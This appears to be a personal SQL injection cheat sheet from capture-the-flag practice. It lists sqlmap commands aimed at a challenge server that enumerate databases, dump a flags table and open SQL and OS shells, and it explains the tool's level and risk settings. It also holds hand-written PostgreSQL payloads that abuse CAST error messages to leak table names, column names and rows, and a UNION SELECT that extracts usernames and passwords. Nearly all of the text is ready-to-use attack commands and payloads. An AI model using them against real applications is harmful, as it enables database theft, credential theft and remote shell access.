MENU 
  
sql saves info on each target under ~/.local/share/sqlmap/output/

sqlmap -u 'http://challs.crate.nu:8901/?search=a' --dbs
sqlmap -u 'http://challs.crate.nu:8901/?search=a' -D public --tables
sqlmap -u 'http://challs.crate.nu:8901/?search=a' -D public -T flags --columns
sqlmap -u 'http://challs.crate.nu:8901/?search=a' -D public -T flags --dump

sqlmap -u 'http://challs.crate.nu:8901/?search=a' --sql-shell
sqlmap -u 'http://challs.crate.nu:8901/?search=a' --os-shell

sqlmap -u 'http://challs.crate.nu:8901/?search=a' --current-user
sqlmap -u 'http://challs.crate.nu:8901/?search=a' --banner
sqlmap -u 'http://challs.crate.nu:8901/?search=a' --users

-level=1 tests a few basic payloads
-level=5 tests a very comprehensive set of payloads
-risk=1 is default
-risk=3 has a higher chance of corrupting the database

Levels

1 A limited number of tests/requests; GET AND POST parameters will be tested (default)
2 Test cookies
3 Test cookies plus User-Agent/Referer
4 As above plus null values in parameters and other bugs
5 An extensive list of tests with an input file for payloads and boundaries

Risks

1 Quick, unnoticeable tests (default)
2 Tests that involve lengthy, heavy data processing, such as time-based SQLI
3 Adds OR-based SQLI and possible data manipulation

Manual payloads

# When you try to cast something and the cast fails, it will often print BLAH could not be CAST to type foo,
# so if you try to concatenate the names of all tables into a long string and cast that to an INT, you get the list tables back:

a%'; SELECT 1 WHERE 42=CAST((SELECT string_agg(table_name, ', ') FROM information_schema.tables) AS INT); SELECT 1 WHERE true or title ilike '
a%'; SELECT 1 WHERE 42=CAST((SELECT string_agg(column_name, ', ') FROM information_schema.columns WHERE table_name = 'flags') AS INT); SELECT 1 WHERE true or title ilike '
a%'; SELECT 1 WHERE 42=CAST((SELECT string_agg(t::text, ', ') FROM flags AS t) AS INT); SELECT 1 WHERE true or title ilike '

# UNION SELECT is also very useful:
SELECT title, text FROM articles UNION SELECT username, password FROM users;